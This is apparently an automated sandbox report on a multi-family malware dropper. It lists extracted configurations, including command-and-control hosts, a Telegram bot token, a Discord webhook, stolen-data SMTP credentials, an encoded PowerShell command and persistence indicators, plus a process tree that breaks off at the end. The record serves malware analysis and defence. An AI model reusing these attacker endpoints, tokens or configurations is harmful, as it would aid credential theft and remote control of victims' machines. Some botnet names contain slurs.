agenttesla | 07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
25/03/2025, 15:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Shitstain.exe
Size

74.9MB
MD5

c7043b9b65e252b5305634da4f5515f1
SHA1

129a58d2c6c4de7fcead562f9729a28e517fb6d4
SHA256

07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a
SHA512

cdc28eb03dcf533d19e74d7bd86962905486902c5556c448bbf0daa69be705dc1f18c7ea2c41ba8568a1910efb711edaa259a02d35108474e412b8044b719575
SSDEEP

1572864:Z6x3bF0F9U7b7ewHkli+ouzl1IBMrGZHdk/6eSDFb:UBF0Fsb7ewHkliN4km+91xb

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

sharpstealer

https://api.telegram.org/bot7057429288:AAHYl5_27YU1Yjmuj33WKOqLVSgYtq3n-8k/getUpdates

Extracted

Family

lokibot

https://rottot.shop/Devil/PWS/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

quasar

Version

1.3.0.0

Botnet

nigga

niggahunter-28633.portmap.io:28633

Mutex

QSR_MUTEX_m0fef2zik6JZzavCsv

Attributes

encryption_key
E3KUWr7JQZqCWN4hstks
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

dropout-37757.portmap.host:55554

dropout-37757.portmap.host:37757

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.6B

Botnet

null

rootedkrypto-29674.portmap.host:29674

Mutex

jsmjjhooulqefd

Attributes

delay
5
install
true
install_file
Minecraft.exe
install_folder
%AppData%

aes.plain

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Family

lumma

https://t5impactsupport.world/api

https://nestlecompany.world/api

https://mercharena.biz/api

https://stormlegue.com/api

https://blast-hubs.com/api

https://blastikcn.com/api

https://lestagames.world/api

Extracted

Family

silverrat

Version

1.0.0.0

clear-spice.gl.at.ply.gg:62042

Mutex

SilverMutex_ZtRAjMMKxS

Attributes

certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
decrypted_key
-|S.S.S|-
discord
https://discord.com/api/webhooks/1335733715820609557/QV6ZUiJPFo3MXmoiKBB-WTBlkHeBiFxmRY95RN_M1sHhPMswAoo2T6AL_kHvoSoCRKE0
key
yy6zDjAUmbB09pKvo5Hhug==
key_x509
dFRzdEVvbU9ZVUR2UmVzZFlPR3V3dlRGWURZdk9S
payload_url
https://g.top4top.io/p_2522c7w8u1.png
reconnect_delay
2
server_signature
PtC8aQAwsdmyktc6Q/l3u9a8oFTj+Ey3VIlIKXe9bX2WiEn7hNPQ0tkMLi1qQ4IBmCWOFTRIVHi2GG5zTxUlAwkitK3X3bWdHiwrf6PqZ7NdmPsSKZym4q+nKXH4df40wtjNvJ2x2m8OSi5jsVvT64/UsmRfIZbFTRp63PCTQ6lN+EL6OoW+dMidok+JH6T8pG21/HyoeykN9muipEqdoixkTFitX6aUocvGy6VZCs7eSxoXtzmYQ3tBukBHuIZAivbVLiF2aDkkpSX6763SGMYUbfASkQ/ihv1elb+XOoqprP3V4GqcllwfGzlk+8/rQD8C3cwLiQEtXgKHbyYWrNcSvis5fYgRcEDvlk2ZkbE8VQE6aNc+VN0TZNW3ldvE+h62kKCYoOb7oJDwiw86IudT01xe9YetmDuCvOIBZqGoXj0h68jOIklH4g22Fx8pOaIisv01vdSoawFzoOQNfgfZeRgjvV6QJHQiYuodn+FWlPwYxQ7FzUJy3is8d0VoJr6rG2BeEn99pW/LO+SsCfPIGZvs7oA/oEsn2BBkGVhlko0IZCxd30q3HIEIwdagGJgHVtnC5C2yMsmjV3geQMUCdRsAJEuCEVqAkTr7QQNJoSCok8jOYoOeJxzwbNzAMySliCDNoGYhhU/jnfhJKsqo355RYtvKROehEYZ0Srg=

Extracted

Family

xworm

Version

5.0

5.tcp.ngrok.io:20448

Mutex

t8HkrZb9wdWvxGpD

Attributes

Install_directory
%LocalAppData%
install_file
Discord.exe

aes.plain

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

March-25

chongmei33.publicvm.com:2703

chongmei33.publicvm.com:7031

umarmira055.duckdns.org:2703

umarmira055.duckdns.org:7031

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
WindowsUpdate.exe
install_folder
%Temp%

aes.plain

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.gmail.com
Port:
587
Username:
[email protected]
Password:
bizr usjt guapiims
Email To:
[email protected]

Extracted

Family

quasar

Version

1.4.1

Botnet

Runtime Broker

senoc43726-29929.portmap.host:29929

Mutex

48854ba7-7fa3-48f5-bfc4-7f597af68d7d

Attributes

encryption_key
26122B3BD81CEECD4FC3F2441D532F19A20471C6
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
discord

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral2/files/0x00070000000244a1-523.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/6624-2242-0x00000000014F0000-0x0000000001500000-memory.dmp	family_xworm

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 4 IoCs

resource	yara_rule
behavioral2/files/0x0007000000024461-247.dat	family_quasar
behavioral2/memory/5684-252-0x0000000000FA0000-0x0000000000FFE000-memory.dmp	family_quasar
behavioral2/files/0x0007000000024549-5740.dat	family_quasar
behavioral2/memory/8316-5747-0x00000000001E0000-0x0000000000504000-memory.dmp	family_quasar

Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
Sality family
sality
Sharp Stealer
Sharp Stealer is an infostealer first observed in 2024, based on Echelon and Umbral stealers.
stealer sharpstealer
Sharpstealer family
sharpstealer
SilverRat
SilverRat is trojan written in C#.
trojan silverrat
Silverrat family
silverrat

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x00090000000244b0-2696.dat	family_xmrig
behavioral2/files/0x00090000000244b0-2696.dat	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/files/0x0008000000024478-361.dat	family_asyncrat
behavioral2/files/0x0009000000024508-2753.dat	family_asyncrat

ModiLoader First Stage 1 IoCs

resource	yara_rule
behavioral2/files/0x000d00000002447b-749.dat	modiloader_stage1

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
7960	powershell.exe
6920	powershell.exe
8324	powershell.exe
1592	powershell.exe
5080	powershell.exe

Downloads MZ/PE file

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6788	attrib.exe
6960	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	Shitstain.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	_[MyFamilyPies]Avi.exe

Executes dropped EXE 12 IoCs

pid	Process
2200	_[MyFamilyPies]Avi.exe
3136	0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
4600	0a-PORNOSKI.exe
4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
5648	svchost.exe
2356	proxyt.exe
4948	1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
5000	5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
5176	Installer.exe
2268	783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
5520	DanaBot.exe
6112	Discord Nitro Generator and Checker.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/memory/2016-617-0x00000000057C0000-0x00000000057D4000-memory.dmp	agile_net

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/files/0x0007000000024481-384.dat	vmprotect
behavioral2/memory/4596-621-0x0000000000140000-0x00000000001E2000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek¸ßÇåÎúÒôÆµ¹ÜÀíÆ÷ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Installer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Installer.exe"	_[MyFamilyPies]Avi.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
45	discord.com
151	discord.com
311	raw.githubusercontent.com
366	raw.githubusercontent.com
62	raw.githubusercontent.com
63	raw.githubusercontent.com
123	5.tcp.ngrok.io
248	5.tcp.ngrok.io
40	discord.com
41	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	api.ipify.org
32	api.ipify.org
38	ip-api.com
58	whatismyipaddress.com
186	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000024492-854.dat	autoit_exe
behavioral2/files/0x0008000000024456-2615.dat	autoit_exe

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\autorun.inf	0a-PORNOSKI.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\autorun.inf	0a-PORNOSKI.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002444b-43.dat	upx
behavioral2/memory/4656-47-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/files/0x000700000002444e-77.dat	upx
behavioral2/memory/2356-96-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/4656-88-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/5640-724-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/2356-1254-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/4492-563-0x0000000002230000-0x00000000032BE000-memory.dmp	upx
behavioral2/memory/4492-565-0x0000000002230000-0x00000000032BE000-memory.dmp	upx
behavioral2/files/0x0007000000024547-5720.dat	upx
behavioral2/memory/8440-5728-0x0000000000200000-0x0000000000D3D000-memory.dmp	upx

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0007000000024477-354.dat	pyinstaller
behavioral2/files/0x000a000000024474-344.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Program crash 9 IoCs

pid	pid_target	Process	procid_target
5324	3524	WerFault.exe
1248	876	WerFault.exe
5560	796	WerFault.exe
6288	4836	WerFault.exe	153
6468	5520	WerFault.exe	101
5784	5520	WerFault.exe	101
6400	5520	WerFault.exe	101
4480	5520	WerFault.exe	101
6656	4436	WerFault.exe	255

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shitstain.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a-PORNOSKI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	proxyt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7640	PING.EXE
7464	PING.EXE
4424	PING.EXE
1060	PING.EXE
6704	PING.EXE
7252	PING.EXE
1596	PING.EXE

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
7736	timeout.exe
7776	timeout.exe
3396	timeout.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
9052	reg.exe
6544	reg.exe
1496	reg.exe
2976	reg.exe
7288	reg.exe
4784	reg.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery

T1018

pid	Process
6704	PING.EXE
7252	PING.EXE
1596	PING.EXE
7640	PING.EXE
7464	PING.EXE
4424	PING.EXE
1060	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8112	schtasks.exe
7864	schtasks.exe
8812	schtasks.exe
3924	schtasks.exe
620	schtasks.exe
7976	schtasks.exe
7464	schtasks.exe
7868	schtasks.exe
7860	schtasks.exe
116	schtasks.exe
1304	schtasks.exe
6576	schtasks.exe
8040	schtasks.exe
7500	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
228	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2200	_[MyFamilyPies]Avi.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	4948	1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
Token: SeDebugPrivilege	5176	Installer.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3908 wrote to memory of 228	3908	Shitstain.exe	89
PID 3908 wrote to memory of 228	3908	Shitstain.exe	89
PID 3908 wrote to memory of 228	3908	Shitstain.exe	89
PID 3908 wrote to memory of 2200	3908	Shitstain.exe	91
PID 3908 wrote to memory of 2200	3908	Shitstain.exe	91
PID 3908 wrote to memory of 3136	3908	Shitstain.exe	92
PID 3908 wrote to memory of 3136	3908	Shitstain.exe	92
PID 3908 wrote to memory of 3136	3908	Shitstain.exe	92
PID 3908 wrote to memory of 4600	3908	Shitstain.exe	93
PID 3908 wrote to memory of 4600	3908	Shitstain.exe	93
PID 3908 wrote to memory of 4600	3908	Shitstain.exe	93
PID 3908 wrote to memory of 4656	3908	Shitstain.exe	168
PID 3908 wrote to memory of 4656	3908	Shitstain.exe	168
PID 3908 wrote to memory of 4656	3908	Shitstain.exe	168
PID 4656 wrote to memory of 5648	4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	95
PID 4656 wrote to memory of 5648	4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	95
PID 4656 wrote to memory of 5648	4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	95
PID 4656 wrote to memory of 2356	4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	96
PID 4656 wrote to memory of 2356	4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	96
PID 4656 wrote to memory of 2356	4656	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	96
PID 3908 wrote to memory of 4948	3908	Shitstain.exe	97
PID 3908 wrote to memory of 4948	3908	Shitstain.exe	97
PID 3908 wrote to memory of 4948	3908	Shitstain.exe	97
PID 3908 wrote to memory of 5000	3908	Shitstain.exe	98
PID 3908 wrote to memory of 5000	3908	Shitstain.exe	98
PID 3908 wrote to memory of 5000	3908	Shitstain.exe	98
PID 2200 wrote to memory of 5176	2200	_[MyFamilyPies]Avi.exe	99
PID 2200 wrote to memory of 5176	2200	_[MyFamilyPies]Avi.exe	99
PID 3908 wrote to memory of 2268	3908	Shitstain.exe	100
PID 3908 wrote to memory of 2268	3908	Shitstain.exe	100
PID 3908 wrote to memory of 2268	3908	Shitstain.exe	100
PID 3908 wrote to memory of 5520	3908	Shitstain.exe	101
PID 3908 wrote to memory of 5520	3908	Shitstain.exe	101
PID 3908 wrote to memory of 5520	3908	Shitstain.exe	101
PID 3908 wrote to memory of 6112	3908	Shitstain.exe	159
PID 3908 wrote to memory of 6112	3908	Shitstain.exe	159

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6960	attrib.exe
6788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Shitstain.exe
"C:\Users\Admin\AppData\Local\Temp\Shitstain.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:228
- C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
  "C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Users\Admin\AppData\Roaming\Installer.exe
    "C:\Users\Admin\AppData\Roaming\Installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5176
- C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
  "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3136
- - C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
    "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
    3⤵
    PID:3816
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
      4⤵
      PID:7748
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
      4⤵
      PID:1336
- C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
  "C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
  2⤵
  - Executes dropped EXE
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  PID:4600
- C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
  "C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4656
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:5648
- - C:\Users\Admin\AppData\Local\Temp\proxyt.exe
    "C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2356
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
      4⤵
      PID:5528
- C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
  "C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4948
- C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
  "C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5000
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    PID:4436
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 84
      4⤵
      Program crash
      PID:6656
- C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
